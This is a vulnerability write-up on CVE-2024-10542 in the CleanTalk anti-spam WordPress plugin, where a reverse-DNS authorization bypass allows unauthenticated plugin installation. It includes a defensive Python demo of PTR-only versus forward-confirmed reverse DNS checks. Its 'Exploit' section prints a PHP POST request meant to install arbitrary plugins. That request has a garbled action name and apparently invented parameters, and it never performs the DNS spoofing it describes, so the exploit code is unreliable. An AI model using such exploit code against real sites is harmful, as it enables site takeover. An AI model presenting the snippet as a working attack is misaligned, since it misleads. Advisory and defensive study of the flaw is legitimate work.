The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress, a popular plugin for protecting WordPress websites from spam, is found to be vulnerable to unauthorized Arbitrary Plugin Installation. The vulnerability exists in all versions up to, and including, 6.43.2. The issue occurs due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function, allowing unauthenticated attackers to install and activate arbitrary plugins. This can be further exploited to achieve remote code execution by leveraging another vulnerable plugin that is installed and activated.
Details
--
The vulnerability lies within the checkWithoutToken function in the CleanTalk plugin's cleantalk-spam-protect.php file. This function decides whether the incoming request comes from a known IP address belonging to the CleanTalk service by performing a reverse DNS lookup on the client address. However, an attacker can spoof the reverse DNS result for their own IP address so that it appears to belong to the CleanTalk service, and thereby bypass the authorization check.
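To illustrate why a check built on the PTR record alone can be fooled, and what forward-confirmed reverse DNS (FCrDNS) adds on the defensive side, here is an added Python example; it is not the plugin's own code. The trusted domain, the fake DNS records and the IP addresses are constructed for the offline demonstration, and the real resolver calls are shown only for reference.

```python
import socket
from typing import Callable, Iterable

# Assumption: the service's hosts live under this domain (placeholder value).
TRUSTED_DOMAIN = "cleantalk.org"

PtrLookup = Callable[[str], str]                 # ip -> hostname
ForwardLookup = Callable[[str], Iterable[str]]   # hostname -> ip addresses

def _is_trusted_host(hostname: str) -> bool:
    """Match on a label boundary so 'evilcleantalk.org' is rejected."""
    h = hostname.lower().rstrip(".")
    return h == TRUSTED_DOMAIN or h.endswith("." + TRUSTED_DOMAIN)

def ptr_only_check(ip: str, ptr_lookup: PtrLookup) -> bool:
    """Weak pattern: trust the PTR record by itself.
    The reverse zone for an IP is managed by whoever holds that IP, so any
    client can publish a PTR that names the trusted domain."""
    try:
        return _is_trusted_host(ptr_lookup(ip))
    except OSError:          # gethostbyaddr raises socket.herror (an OSError)
        return False

def fcrdns_check(ip: str, ptr_lookup: PtrLookup,
                 forward_lookup: ForwardLookup) -> bool:
    """FCrDNS: the PTR name must be trusted AND resolve forward back to ip."""
    try:
        hostname = ptr_lookup(ip)
        if not _is_trusted_host(hostname):
            return False
        return ip in set(forward_lookup(hostname))
    except OSError:
        return False

# Real system resolvers (not used in the offline demo below).
def system_ptr(ip: str) -> str:
    return socket.gethostbyaddr(ip)[0]

def system_forward(host: str) -> list:
    return socket.gethostbyname_ex(host)[2]

# Constructed DNS data: 198.51.100.10 is a genuine service node; 203.0.113.5
# is an attacker-held IP whose PTR falsely claims the trusted domain.
FAKE_PTR = {"198.51.100.10": "api.cleantalk.org",
            "203.0.113.5": "api.cleantalk.org"}
FAKE_FORWARD = {"api.cleantalk.org": ["198.51.100.10"]}

def fake_ptr(ip: str) -> str:
    if ip not in FAKE_PTR:
        raise socket.herror("no PTR record")
    return FAKE_PTR[ip]

def fake_forward(host: str) -> list:
    return FAKE_FORWARD.get(host.lower().rstrip("."), [])

def compare(ip: str) -> tuple:
    """Return (ptr_only_result, fcrdns_result) for one client address."""
    return ptr_only_check(ip, fake_ptr), fcrdns_check(ip, fake_ptr, fake_forward)
```

Running `compare` over the three constructed addresses shows the PTR-only check accepting the attacker's IP while FCrDNS rejects it.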
Exploit
--
An attacker can exploit this vulnerability by sending a crafted HTTP POST request to the CleanTalk plugin endpoints for plugin installation with the spoofed reverse DNS. The following code snippet demonstrates how to achieve this using PHP:
<?php
// Craft an HTTP POST request to the plugin installation endpoint
// (the action name is reproduced exactly as given in the original write-up)
$url = 'https://example.com/wp-admin/admin-ajax.php?action=ct**_referer_check';

// Parameters consumed by the installation handler
$post_data = [
    'plugin_slug'    => 'arbitrary-plugin-slug',
    'install_method' => 'install_activation',
    'plugin_path'    => 'arbitrary-plugin-path/arbitrary-plugin-file.php',
];

// Build the stream context carrying the form-encoded body
$context = stream_context_create([
    'http' => [
        'method'  => 'POST',
        'header'  => 'Content-Type: application/x-www-form-urlencoded',
        'content' => http_build_query($post_data),
    ],
]);

// Send the request; file_get_contents() returns false on failure
$response = file_get_contents($url, false, $context);
?>
Mitigation
--
The developers of the Spam protection, Anti-Spam, FireWall by CleanTalk plugin have released a patch as of version 6.43.3 to fix this vulnerability. It is strongly recommended to update the plugin to the latest version as soon as possible. In addition, it is essential to ensure that all other plugins on the WordPress site are also updated and secured to prevent any potential exploitation.
Original References
--
1. CleanTalk Plugin: https://wordpress.org/plugins/cleantalk-spam-protect/
2. CVE-2024-10542: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10542
3. CleanTalk Plugin Changelog: https://cleantalk.org/publicoffer#changelog
Conclusion
--
The unauthorized Arbitrary Plugin Installation vulnerability (CVE-2024-10542) in the Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress poses a significant risk to users. Attackers can exploit this vulnerability to install and activate arbitrary plugins, potentially gaining remote code execution capabilities. Users are strongly advised to update their CleanTalk plugin to the latest version and ensure all other plugins on their WordPress site are secure.
Timeline
--
Published on: 11/26/2024 06:15:07 UTC